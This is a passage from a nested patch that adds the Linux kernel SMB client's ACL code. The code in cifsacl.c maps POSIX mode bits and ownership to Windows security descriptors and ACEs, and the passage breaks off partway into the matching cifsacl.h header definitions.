++	pntace->flags = 0x0;
++	pntace->access_req = cpu_to_le32(GENERIC_ALL);
++	pntace->sid.num_subauth = 3;
++	pntace->sid.revision = 1;
++	for (i = 0; i < NUM_AUTHS; i++)
++		pntace->sid.authority[i] = sid_unix_NFS_users.authority[i];
++
++	pntace->sid.sub_auth[0] = sid_unix_NFS_users.sub_auth[0];
++	pntace->sid.sub_auth[1] = sid_unix_NFS_users.sub_auth[1];
++	pntace->sid.sub_auth[2] = cpu_to_le32(current_fsgid().val);
++
++	/* size = 1 + 1 + 2 + 4 + 1 + 1 + 6 + (psid->num_subauth*4) */
++	pntace->size = cpu_to_le16(ace_size);
++	return ace_size;
++}
++
++static void populate_new_aces(char *nacl_base,
++		struct cifs_sid *pownersid,
++		struct cifs_sid *pgrpsid,
++		__u64 *pnmode, u32 *pnum_aces, u16 *pnsize,
++		bool modefromsid)
++{
++	__u64 nmode;
++	u32 num_aces = 0;
++	u16 nsize = 0;
++	__u64 user_mode;
++	__u64 group_mode;
++	__u64 other_mode;
++	__u64 deny_user_mode = 0;
++	__u64 deny_group_mode = 0;
++	bool sticky_set = false;
++	struct cifs_ace *pnntace = NULL;
++
++	nmode = *pnmode;
++	num_aces = *pnum_aces;
++	nsize = *pnsize;
++
++	if (modefromsid) {
++		pnntace = (struct cifs_ace *) (nacl_base + nsize);
++		nsize += setup_special_mode_ACE(pnntace, nmode);
++		num_aces++;
++		pnntace = (struct cifs_ace *) (nacl_base + nsize);
++		nsize += setup_authusers_ACE(pnntace);
++		num_aces++;
++		goto set_size;
++	}
++
++	/*
++	 * We'll try to keep the mode as requested by the user.
++	 * But in cases where we cannot meaningfully convert that
++	 * into ACL, return back the updated mode, so that it is
++	 * updated in the inode.
++	 */
++
++	if (!memcmp(pownersid, pgrpsid, sizeof(struct cifs_sid))) {
++		/*
++		 * Case when owner and group SIDs are the same.
++		 * Set the more restrictive of the two modes.
++		 */
++		user_mode = nmode & (nmode << 3) & 0700;
++		group_mode = nmode & (nmode >> 3) & 0070;
++	} else {
++		user_mode = nmode & 0700;
++		group_mode = nmode & 0070;
++	}
++
++	other_mode = nmode & 0007;
++
++	/* We need a DENY ACE when the permissions of a class are more
++	 * restrictive than those of the classes that follow it. */
++	deny_user_mode = ~(user_mode) & ((group_mode << 3) | (other_mode << 6)) & 0700;
++	deny_group_mode = ~(group_mode) & (other_mode << 3) & 0070;
++
++	*pnmode = user_mode | group_mode | other_mode | (nmode & ~0777);
++
++	/* This tells if we should allow delete child for group and everyone. */
++	if (nmode & 01000)
++		sticky_set = true;
++
++	if (deny_user_mode) {
++		pnntace = (struct cifs_ace *) (nacl_base + nsize);
++		nsize += fill_ace_for_sid(pnntace, pownersid, deny_user_mode,
++				0700, ACCESS_DENIED, false);
++		num_aces++;
++	}
++
++	/* Group DENY ACE does not conflict with owner ALLOW ACE. Keep it in the preferred order. */
++	if (deny_group_mode && !(deny_group_mode & (user_mode >> 3))) {
++		pnntace = (struct cifs_ace *) (nacl_base + nsize);
++		nsize += fill_ace_for_sid(pnntace, pgrpsid, deny_group_mode,
++				0070, ACCESS_DENIED, false);
++		num_aces++;
++	}
++
++	pnntace = (struct cifs_ace *) (nacl_base + nsize);
++	nsize += fill_ace_for_sid(pnntace, pownersid, user_mode,
++			0700, ACCESS_ALLOWED, true);
++	num_aces++;
++
++	/* Group DENY ACE conflicts with owner ALLOW ACE. So keep it after. */
++	if (deny_group_mode && (deny_group_mode & (user_mode >> 3))) {
++		pnntace = (struct cifs_ace *) (nacl_base + nsize);
++		nsize += fill_ace_for_sid(pnntace, pgrpsid, deny_group_mode,
++				0070, ACCESS_DENIED, false);
++		num_aces++;
++	}
++
++	pnntace = (struct cifs_ace *) (nacl_base + nsize);
++	nsize += fill_ace_for_sid(pnntace, pgrpsid, group_mode,
++			0070, ACCESS_ALLOWED, !sticky_set);
++	num_aces++;
++
++	pnntace = (struct cifs_ace *) (nacl_base + nsize);
++	nsize += fill_ace_for_sid(pnntace, &sid_everyone, other_mode,
++			0007, ACCESS_ALLOWED, !sticky_set);
++	num_aces++;
++
++set_size:
++	*pnum_aces = num_aces;
++	*pnsize = nsize;
++}
++
++static __u16 replace_sids_and_copy_aces(struct cifs_acl *pdacl, struct cifs_acl *pndacl,
++		struct cifs_sid *pownersid, struct cifs_sid *pgrpsid,
++		struct cifs_sid *pnownersid, struct cifs_sid *pngrpsid)
++{
++	int i;
++	u16 size = 0;
++	struct cifs_ace *pntace = NULL;
++	char *acl_base = NULL;
++	u32 src_num_aces = 0;
++	u16 nsize = 0;
++	struct cifs_ace *pnntace = NULL;
++	char *nacl_base = NULL;
++	u16 ace_size = 0;
++
++	acl_base = (char *)pdacl;
++	size = sizeof(struct cifs_acl);
++	src_num_aces = le32_to_cpu(pdacl->num_aces);
++
++	nacl_base = (char *)pndacl;
++	nsize = sizeof(struct cifs_acl);
++
++	/* Go through all the ACEs */
++	for (i = 0; i < src_num_aces; ++i) {
++		pntace = (struct cifs_ace *) (acl_base + size);
++		pnntace = (struct cifs_ace *) (nacl_base + nsize);
++
++		if (pnownersid && compare_sids(&pntace->sid, pownersid) == 0)
++			ace_size = cifs_copy_ace(pnntace, pntace, pnownersid);
++		else if (pngrpsid && compare_sids(&pntace->sid, pgrpsid) == 0)
++			ace_size = cifs_copy_ace(pnntace, pntace, pngrpsid);
++		else
++			ace_size = cifs_copy_ace(pnntace, pntace, NULL);
++
++		size += le16_to_cpu(pntace->size);
++		nsize += ace_size;
++	}
++
++	return nsize;
++}
++
++static int set_chmod_dacl(struct cifs_acl *pdacl, struct cifs_acl *pndacl,
++		struct cifs_sid *pownersid, struct cifs_sid *pgrpsid,
++		__u64 *pnmode, bool mode_from_sid)
++{
++	int i;
++	u16 size = 0;
++	struct cifs_ace *pntace = NULL;
++	char *acl_base = NULL;
++	u32 src_num_aces = 0;
++	u16 nsize = 0;
++	struct cifs_ace *pnntace = NULL;
++	char *nacl_base = NULL;
++	u32 num_aces = 0;
++	bool new_aces_set = false;
++
++	/* Assuming that pndacl and pnmode are never NULL */
++	nacl_base = (char *)pndacl;
++	nsize = sizeof(struct cifs_acl);
++
++	/* If pdacl is NULL, we don't have a src. Simply populate new ACL. */
++	if (!pdacl) {
++		populate_new_aces(nacl_base,
++				pownersid, pgrpsid,
++				pnmode, &num_aces, &nsize,
++				mode_from_sid);
++		goto finalize_dacl;
++	}
++
++	acl_base = (char *)pdacl;
++	size = sizeof(struct cifs_acl);
++	src_num_aces = le32_to_cpu(pdacl->num_aces);
++
++	/* Retain the old ACEs that we are not replacing */
++	for (i = 0; i < src_num_aces; ++i) {
++		pntace = (struct cifs_ace *) (acl_base + size);
++
++		if (!new_aces_set && (pntace->flags & INHERITED_ACE)) {
++			/* Place the new ACEs in between existing explicit and inherited */
++			populate_new_aces(nacl_base,
++					pownersid, pgrpsid,
++					pnmode, &num_aces, &nsize,
++					mode_from_sid);
++
++			new_aces_set = true;
++		}
++
++		/* If it's any one of the ACEs we're replacing, skip it! */
++		if (((compare_sids(&pntace->sid, &sid_unix_NFS_mode) == 0) ||
++				(compare_sids(&pntace->sid, pownersid) == 0) ||
++				(compare_sids(&pntace->sid, pgrpsid) == 0) ||
++				(compare_sids(&pntace->sid, &sid_everyone) == 0) ||
++				(compare_sids(&pntace->sid, &sid_authusers) == 0))) {
++			goto next_ace;
++		}
++
++		/* update the pointer to the next ACE to populate */
++		pnntace = (struct cifs_ace *) (nacl_base + nsize);
++
++		nsize += cifs_copy_ace(pnntace, pntace, NULL);
++		num_aces++;
++
++next_ace:
++		size += le16_to_cpu(pntace->size);
++	}
++
++	/* If inherited ACEs are not present, place the new ones at the tail */
++	if (!new_aces_set) {
++		populate_new_aces(nacl_base,
++				pownersid, pgrpsid,
++				pnmode, &num_aces, &nsize,
++				mode_from_sid);
++
++		new_aces_set = true;
++	}
++
++finalize_dacl:
++	pndacl->num_aces = cpu_to_le32(num_aces);
++	pndacl->size = cpu_to_le16(nsize);
++
++	return 0;
++}
++
++static int parse_sid(struct cifs_sid *psid, char *end_of_acl)
++{
++	/* BB need to add parm so we can store the SID BB */
++
++	/* validate that we do not go past end of ACL - sid must be at least 8
++	   bytes long (assuming no sub-auths - e.g. the null SID) */
++	if (end_of_acl < (char *)psid + 8) {
++		cifs_dbg(VFS, "ACL too small to parse SID %p\n", psid);
++		return -EINVAL;
++	}
++
++#ifdef CONFIG_CIFS_DEBUG2
++	if (psid->num_subauth) {
++		int i;
++		cifs_dbg(FYI, "SID revision %d num_auth %d\n",
++			 psid->revision, psid->num_subauth);
++
++		for (i = 0; i < psid->num_subauth; i++) {
++			cifs_dbg(FYI, "SID sub_auth[%d]: 0x%x\n",
++				 i, le32_to_cpu(psid->sub_auth[i]));
++		}
++
++		/* BB add length check to make sure that we do not have huge
++			num auths and therefore go off the end */
++		cifs_dbg(FYI, "RID 0x%x\n",
++			 le32_to_cpu(psid->sub_auth[psid->num_subauth-1]));
++	}
++#endif
++
++	return 0;
++}
++
++
++/* Convert CIFS ACL to POSIX form */
++static int parse_sec_desc(struct cifs_sb_info *cifs_sb,
++		struct cifs_ntsd *pntsd, int acl_len, struct cifs_fattr *fattr,
++		bool get_mode_from_special_sid)
++{
++	int rc = 0;
++	struct cifs_sid *owner_sid_ptr, *group_sid_ptr;
++	struct cifs_acl *dacl_ptr; /* no need for SACL ptr */
++	char *end_of_acl = ((char *)pntsd) + acl_len;
++	__u32 dacloffset;
++
++	if (pntsd == NULL)
++		return -EIO;
++
++	owner_sid_ptr = (struct cifs_sid *)((char *)pntsd +
++				le32_to_cpu(pntsd->osidoffset));
++	group_sid_ptr = (struct cifs_sid *)((char *)pntsd +
++				le32_to_cpu(pntsd->gsidoffset));
++	dacloffset = le32_to_cpu(pntsd->dacloffset);
++	dacl_ptr = (struct cifs_acl *)((char *)pntsd + dacloffset);
++	cifs_dbg(NOISY, "revision %d type 0x%x ooffset 0x%x goffset 0x%x sacloffset 0x%x dacloffset 0x%x\n",
++		 pntsd->revision, pntsd->type, le32_to_cpu(pntsd->osidoffset),
++		 le32_to_cpu(pntsd->gsidoffset),
++		 le32_to_cpu(pntsd->sacloffset), dacloffset);
++/*	cifs_dump_mem("owner_sid: ", owner_sid_ptr, 64); */
++	rc = parse_sid(owner_sid_ptr, end_of_acl);
++	if (rc) {
++		cifs_dbg(FYI, "%s: Error %d parsing Owner SID\n", __func__, rc);
++		return rc;
++	}
++	rc = sid_to_id(cifs_sb, owner_sid_ptr, fattr, SIDOWNER);
++	if (rc) {
++		cifs_dbg(FYI, "%s: Error %d mapping Owner SID to uid\n",
++			 __func__, rc);
++		return rc;
++	}
++
++	rc = parse_sid(group_sid_ptr, end_of_acl);
++	if (rc) {
++		cifs_dbg(FYI, "%s: Error %d parsing Group SID\n",
++			 __func__, rc);
++		return rc;
++	}
++	rc = sid_to_id(cifs_sb, group_sid_ptr, fattr, SIDGROUP);
++	if (rc) {
++		cifs_dbg(FYI, "%s: Error %d mapping Group SID to gid\n",
++			 __func__, rc);
++		return rc;
++	}
++
++	if (dacloffset)
++		parse_dacl(dacl_ptr, end_of_acl, owner_sid_ptr,
++			   group_sid_ptr, fattr, get_mode_from_special_sid);
++	else
++		cifs_dbg(FYI, "no ACL\n"); /* BB grant all or default perms? */
++
++	return rc;
++}
++
++/* Convert permission bits from mode to equivalent CIFS ACL */
++static int build_sec_desc(struct cifs_ntsd *pntsd, struct cifs_ntsd *pnntsd,
++	__u32 secdesclen, __u32 *pnsecdesclen, __u64 *pnmode, kuid_t uid, kgid_t gid,
++	bool mode_from_sid, bool id_from_sid, int *aclflag)
++{
++	int rc = 0;
++	__u32 dacloffset;
++	__u32 ndacloffset;
++	__u32 sidsoffset;
++	struct cifs_sid *owner_sid_ptr, *group_sid_ptr;
++	struct cifs_sid *nowner_sid_ptr = NULL, *ngroup_sid_ptr = NULL;
++	struct cifs_acl *dacl_ptr = NULL;  /* no need for SACL ptr */
++	struct cifs_acl *ndacl_ptr = NULL; /* no need for SACL ptr */
++	char *end_of_acl = ((char *)pntsd) + secdesclen;
++	u16 size = 0;
++
++	dacloffset = le32_to_cpu(pntsd->dacloffset);
++	if (dacloffset) {
++		dacl_ptr = (struct cifs_acl *)((char *)pntsd + dacloffset);
++		if (end_of_acl < (char *)dacl_ptr + le16_to_cpu(dacl_ptr->size)) {
++			cifs_dbg(VFS, "Server returned illegal ACL size\n");
++			return -EINVAL;
++		}
++	}
++
++	owner_sid_ptr = (struct cifs_sid *)((char *)pntsd +
++			le32_to_cpu(pntsd->osidoffset));
++	group_sid_ptr = (struct cifs_sid *)((char *)pntsd +
++			le32_to_cpu(pntsd->gsidoffset));
++
++	if (pnmode && *pnmode != NO_CHANGE_64) { /* chmod */
++		ndacloffset = sizeof(struct cifs_ntsd);
++		ndacl_ptr = (struct cifs_acl *)((char *)pnntsd + ndacloffset);
++		ndacl_ptr->revision =
++			dacloffset ? dacl_ptr->revision : cpu_to_le16(ACL_REVISION);
++
++		ndacl_ptr->size = cpu_to_le16(0);
++		ndacl_ptr->num_aces = cpu_to_le32(0);
++
++		rc = set_chmod_dacl(dacl_ptr, ndacl_ptr, owner_sid_ptr, group_sid_ptr,
++				    pnmode, mode_from_sid);
++
++		sidsoffset = ndacloffset + le16_to_cpu(ndacl_ptr->size);
++		/* copy the non-dacl portion of secdesc */
++		*pnsecdesclen = copy_sec_desc(pntsd, pnntsd, sidsoffset,
++				NULL, NULL);
++
++		*aclflag |= CIFS_ACL_DACL;
++	} else {
++		ndacloffset = sizeof(struct cifs_ntsd);
++		ndacl_ptr = (struct cifs_acl *)((char *)pnntsd + ndacloffset);
++		ndacl_ptr->revision =
++			dacloffset ? dacl_ptr->revision : cpu_to_le16(ACL_REVISION);
++		ndacl_ptr->num_aces = dacl_ptr ? dacl_ptr->num_aces : 0;
++
++		if (uid_valid(uid)) { /* chown */
++			uid_t id;
++			nowner_sid_ptr = kzalloc(sizeof(struct cifs_sid),
++								GFP_KERNEL);
++			if (!nowner_sid_ptr) {
++				rc = -ENOMEM;
++				goto chown_chgrp_exit;
++			}
++			id = from_kuid(&init_user_ns, uid);
++			if (id_from_sid) {
++				struct owner_sid *osid = (struct owner_sid *)nowner_sid_ptr;
++				/* Populate the user ownership fields S-1-5-88-1 */
++				osid->Revision = 1;
++				osid->NumAuth = 3;
++				osid->Authority[5] = 5;
++				osid->SubAuthorities[0] = cpu_to_le32(88);
++				osid->SubAuthorities[1] = cpu_to_le32(1);
++				osid->SubAuthorities[2] = cpu_to_le32(id);
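++				/* e.g. uid 1000 becomes S-1-5-88-1-1000 */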
++
++			} else { /* lookup sid with upcall */
++				rc = id_to_sid(id, SIDOWNER, nowner_sid_ptr);
++				if (rc) {
++					cifs_dbg(FYI, "%s: Mapping error %d for owner id %d\n",
++						 __func__, rc, id);
++					goto chown_chgrp_exit;
++				}
++			}
++			*aclflag |= CIFS_ACL_OWNER;
++		}
++		if (gid_valid(gid)) { /* chgrp */
++			gid_t id;
++			ngroup_sid_ptr = kzalloc(sizeof(struct cifs_sid),
++								GFP_KERNEL);
++			if (!ngroup_sid_ptr) {
++				rc = -ENOMEM;
++				goto chown_chgrp_exit;
++			}
++			id = from_kgid(&init_user_ns, gid);
++			if (id_from_sid) {
++				struct owner_sid *gsid = (struct owner_sid *)ngroup_sid_ptr;
++				/* Populate the group ownership fields S-1-5-88-2 */
++				gsid->Revision = 1;
++				gsid->NumAuth = 3;
++				gsid->Authority[5] = 5;
++				gsid->SubAuthorities[0] = cpu_to_le32(88);
++				gsid->SubAuthorities[1] = cpu_to_le32(2);
++				gsid->SubAuthorities[2] = cpu_to_le32(id);
++
++			} else { /* lookup sid with upcall */
++				rc = id_to_sid(id, SIDGROUP, ngroup_sid_ptr);
++				if (rc) {
++					cifs_dbg(FYI, "%s: Mapping error %d for group id %d\n",
++						 __func__, rc, id);
++					goto chown_chgrp_exit;
++				}
++			}
++			*aclflag |= CIFS_ACL_GROUP;
++		}
++
++		if (dacloffset) {
++			/* Replace ACEs for old owner with new one */
++			size = replace_sids_and_copy_aces(dacl_ptr, ndacl_ptr,
++					owner_sid_ptr, group_sid_ptr,
++					nowner_sid_ptr, ngroup_sid_ptr);
++			ndacl_ptr->size = cpu_to_le16(size);
++		}
++
++		sidsoffset = ndacloffset + le16_to_cpu(ndacl_ptr->size);
++		/* copy the non-dacl portion of secdesc */
++		*pnsecdesclen = copy_sec_desc(pntsd, pnntsd, sidsoffset,
++				nowner_sid_ptr, ngroup_sid_ptr);
++
++chown_chgrp_exit:
++		/* errors could jump here, so make sure we return soon after this */
++		kfree(nowner_sid_ptr);
++		kfree(ngroup_sid_ptr);
++	}
++
++	return rc;
++}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++struct cifs_ntsd *get_cifs_acl_by_fid(struct cifs_sb_info *cifs_sb,
++				      const struct cifs_fid *cifsfid, u32 *pacllen,
++				      u32 __maybe_unused unused)
++{
++	struct cifs_ntsd *pntsd = NULL;
++	unsigned int xid;
++	int rc;
++	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
++
++	if (IS_ERR(tlink))
++		return ERR_CAST(tlink);
++
++	xid = get_xid();
++	rc = CIFSSMBGetCIFSACL(xid, tlink_tcon(tlink), cifsfid->netfid, &pntsd,
++				pacllen);
++	free_xid(xid);
++
++	cifs_put_tlink(tlink);
++
++	cifs_dbg(FYI, "%s: rc = %d ACL len %d\n", __func__, rc, *pacllen);
++	if (rc)
++		return ERR_PTR(rc);
++	return pntsd;
++}
++
++static struct cifs_ntsd *get_cifs_acl_by_path(struct cifs_sb_info *cifs_sb,
++		const char *path, u32 *pacllen)
++{
++	struct cifs_ntsd *pntsd = NULL;
++	int oplock = 0;
++	unsigned int xid;
++	int rc;
++	struct cifs_tcon *tcon;
++	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
++	struct cifs_fid fid;
++	struct cifs_open_parms oparms;
++
++	if (IS_ERR(tlink))
++		return ERR_CAST(tlink);
++
++	tcon = tlink_tcon(tlink);
++	xid = get_xid();
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = READ_CONTROL,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.disposition = FILE_OPEN,
++		.path = path,
++		.fid = &fid,
++	};
++
++	rc = CIFS_open(xid, &oparms, &oplock, NULL);
++	if (!rc) {
++		rc = CIFSSMBGetCIFSACL(xid, tcon, fid.netfid, &pntsd, pacllen);
++		CIFSSMBClose(xid, tcon, fid.netfid);
++	}
++
++	cifs_put_tlink(tlink);
++	free_xid(xid);
++
++	cifs_dbg(FYI, "%s: rc = %d ACL len %d\n", __func__, rc, *pacllen);
++	if (rc)
++		return ERR_PTR(rc);
++	return pntsd;
++}
++
++/* Retrieve an ACL from the server */
++struct cifs_ntsd *get_cifs_acl(struct cifs_sb_info *cifs_sb,
++				      struct inode *inode, const char *path,
++			       u32 *pacllen, u32 info)
++{
++	struct cifs_ntsd *pntsd = NULL;
++	struct cifsFileInfo *open_file = NULL;
++
++	if (inode)
++		open_file = find_readable_file(CIFS_I(inode), true);
++	if (!open_file)
++		return get_cifs_acl_by_path(cifs_sb, path, pacllen);
++
++	pntsd = get_cifs_acl_by_fid(cifs_sb, &open_file->fid, pacllen, info);
++	cifsFileInfo_put(open_file);
++	return pntsd;
++}
++
++ /* Set an ACL on the server */
++int set_cifs_acl(struct cifs_ntsd *pnntsd, __u32 acllen,
++			struct inode *inode, const char *path, int aclflag)
++{
++	int oplock = 0;
++	unsigned int xid;
++	int rc, access_flags;
++	struct cifs_tcon *tcon;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
++	struct cifs_fid fid;
++	struct cifs_open_parms oparms;
++
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++
++	tcon = tlink_tcon(tlink);
++	xid = get_xid();
++
++	if (aclflag == CIFS_ACL_OWNER || aclflag == CIFS_ACL_GROUP)
++		access_flags = WRITE_OWNER;
++	else
++		access_flags = WRITE_DAC;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = access_flags,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.disposition = FILE_OPEN,
++		.path = path,
++		.fid = &fid,
++	};
++
++	rc = CIFS_open(xid, &oparms, &oplock, NULL);
++	if (rc) {
++		cifs_dbg(VFS, "Unable to open file to set ACL\n");
++		goto out;
++	}
++
++	rc = CIFSSMBSetCIFSACL(xid, tcon, fid.netfid, pnntsd, acllen, aclflag);
++	cifs_dbg(NOISY, "SetCIFSACL rc = %d\n", rc);
++
++	CIFSSMBClose(xid, tcon, fid.netfid);
++out:
++	free_xid(xid);
++	cifs_put_tlink(tlink);
++	return rc;
++}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++/* Translate the CIFS ACL (similar to NTFS ACL) for a file into mode bits */
++int
++cifs_acl_to_fattr(struct cifs_sb_info *cifs_sb, struct cifs_fattr *fattr,
++		  struct inode *inode, bool mode_from_special_sid,
++		  const char *path, const struct cifs_fid *pfid)
++{
++	struct cifs_ntsd *pntsd = NULL;
++	u32 acllen = 0;
++	int rc = 0;
++	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
++	struct smb_version_operations *ops;
++	const u32 info = 0;
++
++	cifs_dbg(NOISY, "converting ACL to mode for %s\n", path);
++
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++
++	ops = tlink_tcon(tlink)->ses->server->ops;
++
++	if (pfid && (ops->get_acl_by_fid))
++		pntsd = ops->get_acl_by_fid(cifs_sb, pfid, &acllen, info);
++	else if (ops->get_acl)
++		pntsd = ops->get_acl(cifs_sb, inode, path, &acllen, info);
++	else {
++		cifs_put_tlink(tlink);
++		return -EOPNOTSUPP;
++	}
++	/* if we can retrieve the ACL, now parse Access Control Entries, ACEs */
++	if (IS_ERR(pntsd)) {
++		rc = PTR_ERR(pntsd);
++		cifs_dbg(VFS, "%s: error %d getting sec desc\n", __func__, rc);
++	} else if (mode_from_special_sid) {
++		rc = parse_sec_desc(cifs_sb, pntsd, acllen, fattr, true);
++		kfree(pntsd);
++	} else {
++		/* get approximated mode from ACL */
++		rc = parse_sec_desc(cifs_sb, pntsd, acllen, fattr, false);
++		kfree(pntsd);
++		if (rc)
++			cifs_dbg(VFS, "parse sec desc failed rc = %d\n", rc);
++	}
++
++	cifs_put_tlink(tlink);
++
++	return rc;
++}
++
++/* Convert mode bits to an ACL so we can update the ACL on the server */
++int
++id_mode_to_cifs_acl(struct inode *inode, const char *path, __u64 *pnmode,
++			kuid_t uid, kgid_t gid)
++{
++	int rc = 0;
++	int aclflag = CIFS_ACL_DACL; /* default flag to set */
++	__u32 secdesclen = 0;
++	__u32 nsecdesclen = 0;
++	__u32 dacloffset = 0;
++	struct cifs_acl *dacl_ptr = NULL;
++	struct cifs_ntsd *pntsd = NULL; /* acl obtained from server */
++	struct cifs_ntsd *pnntsd = NULL; /* modified acl to be sent to server */
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
++	struct smb_version_operations *ops;
++	bool mode_from_sid, id_from_sid;
++	const u32 info = 0;
++
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++
++	ops = tlink_tcon(tlink)->ses->server->ops;
++
++	cifs_dbg(NOISY, "set ACL from mode for %s\n", path);
++
++	/* Get the security descriptor */
++
++	if (ops->get_acl == NULL) {
++		cifs_put_tlink(tlink);
++		return -EOPNOTSUPP;
++	}
++
++	pntsd = ops->get_acl(cifs_sb, inode, path, &secdesclen, info);
++	if (IS_ERR(pntsd)) {
++		rc = PTR_ERR(pntsd);
++		cifs_dbg(VFS, "%s: error %d getting sec desc\n", __func__, rc);
++		cifs_put_tlink(tlink);
++		return rc;
++	}
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MODE_FROM_SID)
++		mode_from_sid = true;
++	else
++		mode_from_sid = false;
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UID_FROM_ACL)
++		id_from_sid = true;
++	else
++		id_from_sid = false;
++
++	/* Potentially, five new ACEs can be added to the ACL for U,G,O mapping */
++	nsecdesclen = secdesclen;
++	if (pnmode && *pnmode != NO_CHANGE_64) { /* chmod */
++		if (mode_from_sid)
++			nsecdesclen += 2 * sizeof(struct cifs_ace);
++		else /* cifsacl */
++			nsecdesclen += 5 * sizeof(struct cifs_ace);
++	} else { /* chown */
++		/* When ownership changes, the new owner SID length could be different */
++		nsecdesclen = sizeof(struct cifs_ntsd) + (sizeof(struct cifs_sid) * 2);
++		dacloffset = le32_to_cpu(pntsd->dacloffset);
++		if (dacloffset) {
++			dacl_ptr = (struct cifs_acl *)((char *)pntsd + dacloffset);
++			if (mode_from_sid)
++				nsecdesclen +=
++					le32_to_cpu(dacl_ptr->num_aces) * sizeof(struct cifs_ace);
++			else /* cifsacl */
++				nsecdesclen += le16_to_cpu(dacl_ptr->size);
++		}
++	}
++
++	/*
++	 * Add three ACEs for owner, group and everyone, getting rid of the
++	 * other ACEs, as chmod disables ACEs and sets the security descriptor.
++	 * Allocate memory for the SMB header, the set security descriptor
++	 * request parameters, and the security descriptor itself.
++	 */
++	nsecdesclen = max_t(u32, nsecdesclen, DEFAULT_SEC_DESC_LEN);
++	pnntsd = kmalloc(nsecdesclen, GFP_KERNEL);
++	if (!pnntsd) {
++		kfree(pntsd);
++		cifs_put_tlink(tlink);
++		return -ENOMEM;
++	}
++
++	rc = build_sec_desc(pntsd, pnntsd, secdesclen, &nsecdesclen, pnmode, uid, gid,
++			    mode_from_sid, id_from_sid, &aclflag);
++
++	cifs_dbg(NOISY, "build_sec_desc rc: %d\n", rc);
++
++	if (ops->set_acl == NULL)
++		rc = -EOPNOTSUPP;
++
++	if (!rc) {
++		/* Set the security descriptor */
++		rc = ops->set_acl(pnntsd, nsecdesclen, inode, path, aclflag);
++		cifs_dbg(NOISY, "set_cifs_acl rc: %d\n", rc);
++	}
++	cifs_put_tlink(tlink);
++
++	kfree(pnntsd);
++	kfree(pntsd);
++	return rc;
++}
+diff --git a/fs/smb/client/cifsacl.h b/fs/smb/client/cifsacl.h
+new file mode 100644
+index 0000000000000..ccbfc754bd3c7
+--- /dev/null
++++ b/fs/smb/client/cifsacl.h
+@@ -0,0 +1,199 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *
++ *   Copyright (c) International Business Machines  Corp., 2007
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++
++#ifndef _CIFSACL_H
++#define _CIFSACL_H
++
++#define NUM_AUTHS (6)	/* number of authority fields */
++#define SID_MAX_SUB_AUTHORITIES (15) /* max number of sub authority fields */
++
++#define READ_BIT        0x4
++#define WRITE_BIT       0x2
++#define EXEC_BIT        0x1
++
++#define ACL_OWNER_MASK 0700
++#define ACL_GROUP_MASK 0070
++#define ACL_EVERYONE_MASK 0007
++
++#define UBITSHIFT	6
++#define GBITSHIFT	3
++
++#define ACCESS_ALLOWED	0
++#define ACCESS_DENIED	1
++
++#define SIDOWNER 1
++#define SIDGROUP 2
++
++/*
++ * Security Descriptor length containing DACL with 3 ACEs (one each for
++ * owner, group and world).
++ */
++#define DEFAULT_SEC_DESC_LEN (sizeof(struct cifs_ntsd) + \
++			      sizeof(struct cifs_acl) + \
++			      (sizeof(struct cifs_ace) * 4))
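++
++/*
++ * Note: the macro reserves space for a fourth ACE beyond the three listed
++ * above, presumably as headroom, e.g. for the special mode ACE used by the
++ * mode-from-SID scheme.
++ */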
++
++/*
++ * Maximum size of a string representation of a SID:
++ *
++ * The fields are unsigned values in decimal. So:
++ *
++ * u8:  max 3 bytes in decimal
++ * u32: max 10 bytes in decimal
++ *
++ * "S-" + 3 bytes for version field + 15 for authority field + NULL terminator
++ *
++ * For authority field, max is when all 6 values are non-zero and it must be
++ * represented in hex. So "-0x" + 12 hex digits.
++ *
++ * Add 11 bytes for each subauthority field (10 bytes each + 1 for '-')
++ */
++#define SID_STRING_BASE_SIZE (2 + 3 + 15 + 1)
++#define SID_STRING_SUBAUTH_SIZE (11) /* size of a single subauth string */
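++
++/*
++ * Worst case, with all SID_MAX_SUB_AUTHORITIES (15) subauthorities present,
++ * a SID string needs SID_STRING_BASE_SIZE + 15 * SID_STRING_SUBAUTH_SIZE =
++ * 21 + 165 = 186 bytes.
++ */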
++
++struct cifs_ntsd {
++	__le16 revision; /* revision level */
++	__le16 type;
++	__le32 osidoffset;
++	__le32 gsidoffset;
++	__le32 sacloffset;
++	__le32 dacloffset;
++} __attribute__((packed));
++
++struct cifs_sid {
++	__u8 revision; /* revision level */
++	__u8 num_subauth;
++	__u8 authority[NUM_AUTHS];
++	__le32 sub_auth[SID_MAX_SUB_AUTHORITIES]; /* sub_auth[num_subauth] */
++} __attribute__((packed));
++
++/* size of a struct cifs_sid, sans sub_auth array */
++#define CIFS_SID_BASE_SIZE (1 + 1 + NUM_AUTHS)
++
++struct cifs_acl {
++	__le16 revision; /* revision level */
++	__le16 size;
++	__le32 num_aces;
++} __attribute__((packed));
++
++/* ACE types - see MS-DTYP 2.4.4.1 */
++#define ACCESS_ALLOWED_ACE_TYPE	0x00
++#define ACCESS_DENIED_ACE_TYPE	0x01
++#define SYSTEM_AUDIT_ACE_TYPE	0x02
++#define SYSTEM_ALARM_ACE_TYPE	0x03
++#define ACCESS_ALLOWED_COMPOUND_ACE_TYPE 0x04
++#define ACCESS_ALLOWED_OBJECT_ACE_TYPE	0x05
++#define ACCESS_DENIED_OBJECT_ACE_TYPE	0x06
